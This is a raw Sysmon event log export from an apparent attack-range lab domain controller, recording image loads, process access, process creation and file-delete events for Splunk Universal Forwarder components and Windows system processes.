13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000098360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x800000000000000098354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.682{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD4E298B48412F2302A47A1717A76747,SHA256=F83D41BE0E9F9FD8390B829AD83B76786834C65303BA8BE2B23B698869E92ED5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.666{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFD156FF2BEB9140D044A260152F4220,SHA256=3D2B1D12479E0AAB5184FEEBA581E2B61A379CE09688EE6FFFDB1C6863CCCA8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.666{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5AFDE6E10DDB25C445D5CC2421ED695B,SHA256=91ADF5844BFA6BB1CCBACF3C76CCB1203DFE40B931AF8242593DBCA071C71F8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.244{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.244{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.244{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 10341000x800000000000000098485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.213{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 